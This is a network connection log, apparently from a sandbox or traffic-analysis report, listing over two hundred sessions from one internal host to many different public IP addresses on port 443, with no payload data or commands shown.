                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21466192.168.2.2334826212.48.236.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21467192.168.2.2336350129.183.11.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21468192.168.2.2357680143.179.231.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21469192.168.2.234722270.245.163.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21470192.168.2.234021869.158.236.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21471192.168.2.234327073.196.146.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21472192.168.2.2353838147.175.254.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21473192.168.2.234199250.229.30.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21474192.168.2.2347732177.201.68.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21475192.168.2.2353984107.181.250.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21476192.168.2.233907868.62.51.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21477192.168.2.234585025.34.152.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21478192.168.2.2334102199.233.86.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21479192.168.2.2350638145.120.53.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21480192.168.2.235380847.151.54.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21481192.168.2.2337910137.175.90.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21482192.168.2.2338290207.94.68.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21483192.168.2.2355212171.74.7.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21484192.168.2.234788824.2.71.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21485192.168.2.235843634.226.150.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21486192.168.2.2346240123.92.135.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21487192.168.2.2346580103.108.227.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21488192.168.2.2355386128.144.174.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21489192.168.2.233770093.170.27.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21490192.168.2.2345194122.30.199.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21491192.168.2.2345964201.165.106.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21492192.168.2.2341372178.195.129.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21493192.168.2.2341568221.1.38.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21494192.168.2.2350630193.116.255.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21495192.168.2.2344460207.223.231.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21496192.168.2.2345640100.48.32.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21497192.168.2.2357980160.139.36.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21498192.168.2.2334386160.109.63.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21499192.168.2.2348860207.248.34.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21500192.168.2.234595452.102.221.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21501192.168.2.2352230174.230.27.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21502192.168.2.234733652.79.227.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21503192.168.2.2359072163.104.76.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21504192.168.2.23588345.44.244.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21505192.168.2.2347522159.169.46.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21506192.168.2.233680619.65.38.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21507192.168.2.2349506163.213.135.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21508192.168.2.236066838.134.202.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21509192.168.2.235456444.208.3.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21510192.168.2.2337442182.166.187.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21511192.168.2.234034289.135.27.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21512192.168.2.234316018.249.0.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21513192.168.2.2334254139.159.41.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21514192.168.2.2356086145.111.1.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21515192.168.2.233680648.51.201.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21516192.168.2.233734289.216.127.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21517192.168.2.2344708160.75.162.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21518192.168.2.2357140196.241.25.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21519192.168.2.2345080206.224.116.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21520192.168.2.2358380162.212.151.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21521192.168.2.2340816110.6.60.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21522192.168.2.2358778111.43.37.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21523192.168.2.234388446.66.111.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21524192.168.2.2357578120.38.9.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21525192.168.2.234696875.121.209.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21526192.168.2.2335634202.208.184.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21527192.168.2.2350028130.27.131.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21528192.168.2.2333598122.219.190.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21529192.168.2.23529268.242.65.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21530192.168.2.2357472128.193.172.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21531192.168.2.235713648.61.229.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21532192.168.2.23452365.39.78.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21533192.168.2.2341246220.221.147.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21534192.168.2.233999846.243.39.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21535192.168.2.233601083.32.175.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21536192.168.2.235057270.43.79.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21537192.168.2.233285095.65.248.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21538192.168.2.2355040167.72.140.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21539192.168.2.2349868190.241.45.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21540192.168.2.235884471.133.177.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21541192.168.2.2356142134.20.195.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21542192.168.2.235632264.209.116.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21543192.168.2.234422074.236.119.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21544192.168.2.2356060101.238.135.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21545192.168.2.234184475.52.51.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21546192.168.2.233654481.98.18.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21547192.168.2.235052635.0.146.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21548192.168.2.2342568104.53.50.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21549192.168.2.2346658194.44.178.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21550192.168.2.2339224219.53.204.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21551192.168.2.2347078185.206.121.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21552192.168.2.2351232145.1.96.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21553192.168.2.2334392183.4.207.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21554192.168.2.2358732139.220.142.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21555192.168.2.2347666191.28.23.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21556192.168.2.233818217.212.183.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21557192.168.2.2342582204.196.134.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21558192.168.2.2354796199.199.97.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21559192.168.2.2344722155.203.143.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21560192.168.2.2337412132.22.37.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21561192.168.2.235774039.251.28.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21562192.168.2.2355530197.16.118.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21563192.168.2.2360546163.103.83.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21564192.168.2.2336770212.10.240.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21565192.168.2.2359760204.69.123.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21566192.168.2.2350226193.5.68.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21567192.168.2.234734825.35.94.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21568192.168.2.236029246.255.250.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21569192.168.2.2346702183.40.173.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21570192.168.2.2349854109.219.38.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21571192.168.2.2354072203.81.135.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21572192.168.2.2357722103.66.97.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21573192.168.2.234319883.137.102.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21574192.168.2.2338792183.76.99.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21575192.168.2.2352286103.78.134.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21576192.168.2.2334052184.155.218.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21577192.168.2.2342676183.102.177.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21578192.168.2.2352986223.162.180.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21579192.168.2.235766684.129.116.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21580192.168.2.2335694112.106.26.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21581192.168.2.2357718157.114.143.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21582192.168.2.2347568184.184.35.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21583192.168.2.2338654180.8.211.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21584192.168.2.234723267.68.24.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21585192.168.2.2351652182.251.245.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21586192.168.2.2338228200.134.26.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21587192.168.2.2346938149.100.51.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21588192.168.2.2335146147.142.148.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21589192.168.2.234194495.206.159.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21590192.168.2.2350714222.215.117.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21591192.168.2.236074288.70.201.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21592192.168.2.233869299.196.206.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21593192.168.2.233768684.254.181.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21594192.168.2.233927838.122.23.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21595192.168.2.233524823.15.80.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21596192.168.2.235183072.186.158.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21597192.168.2.234039437.5.28.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21598192.168.2.2335000111.140.144.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21599192.168.2.2344418143.85.72.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21600192.168.2.233570460.53.181.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21601192.168.2.2352022193.206.67.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21602192.168.2.233718436.247.54.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21603192.168.2.2343702189.203.184.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21604192.168.2.235763060.241.247.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21605192.168.2.2356606131.146.76.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21606192.168.2.235630269.42.177.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21607192.168.2.234843480.187.166.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21608192.168.2.2335158147.21.41.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21609192.168.2.234891217.109.194.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21610192.168.2.2334518167.227.21.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21611192.168.2.2342484124.10.111.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21612192.168.2.2357320141.69.224.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21613192.168.2.233346639.6.235.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21614192.168.2.235544652.33.169.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21615192.168.2.233554045.236.51.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21616192.168.2.2344850147.124.64.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21617192.168.2.233558218.140.66.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21618192.168.2.234703488.42.116.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21619192.168.2.233294243.138.52.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21620192.168.2.2360802163.82.222.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21621192.168.2.2336106152.145.20.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21622192.168.2.234300269.24.15.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21623192.168.2.2338000179.77.129.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21624192.168.2.2344854138.25.184.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21625192.168.2.235896465.117.26.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21626192.168.2.234785669.95.127.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21627192.168.2.2346278191.103.65.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21628192.168.2.2352790116.147.218.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21629192.168.2.2337172163.92.229.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21630192.168.2.234355651.117.157.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21631192.168.2.234739054.66.65.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21632192.168.2.2337550182.121.148.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21633192.168.2.2343180161.89.78.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21634192.168.2.2355414149.8.29.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21635192.168.2.235046019.236.18.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21636192.168.2.2356220102.243.35.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21637192.168.2.2343918124.208.27.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21638192.168.2.233682825.29.53.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21639192.168.2.2359280123.127.0.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21640192.168.2.2356284116.33.179.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21641192.168.2.2343708140.240.247.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21642192.168.2.233334037.123.146.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21643192.168.2.2338796150.28.143.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21644192.168.2.233418676.30.207.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21645192.168.2.235005889.53.116.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21646192.168.2.2351332134.132.57.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21647192.168.2.234696087.65.39.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21648192.168.2.2348216152.224.195.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21649192.168.2.2357952103.57.152.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21650192.168.2.2355830216.153.22.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21651192.168.2.235901639.239.31.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21652192.168.2.2351276197.58.251.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21653192.168.2.235383263.57.195.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21654192.168.2.2342198196.100.35.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21655192.168.2.235165899.229.7.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21656192.168.2.2344544195.224.246.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21657192.168.2.2352970113.141.143.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21658192.168.2.2342446112.98.21.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21659192.168.2.235895231.1.36.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21660192.168.2.235733858.144.79.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21661192.168.2.2353796185.29.138.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21662192.168.2.2347404221.7.175.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21663192.168.2.234446289.29.140.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21664192.168.2.235115442.57.71.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21665192.168.2.2360310190.255.193.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21666192.168.2.233450279.221.182.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21667192.168.2.2336994169.29.237.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21668192.168.2.2356910204.225.203.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21669192.168.2.2352408144.96.244.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21670192.168.2.2340572104.86.134.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21671192.168.2.2356374220.167.62.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21672192.168.2.2345476177.224.92.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21673192.168.2.2334316180.27.78.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21674192.168.2.235822427.29.250.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21675192.168.2.235131059.178.241.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21676192.168.2.233446472.193.177.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21677192.168.2.233798476.62.165.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21678192.168.2.2333772159.198.231.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21679192.168.2.2359036156.190.88.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21680192.168.2.2347694108.1.206.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21681192.168.2.234529087.178.107.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21682192.168.2.2336704125.166.251.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21683192.168.2.235378661.143.173.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21684192.168.2.2339106153.81.173.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21685192.168.2.235425418.1.108.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21686192.168.2.235944689.62.180.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21687192.168.2.234990019.150.210.116443
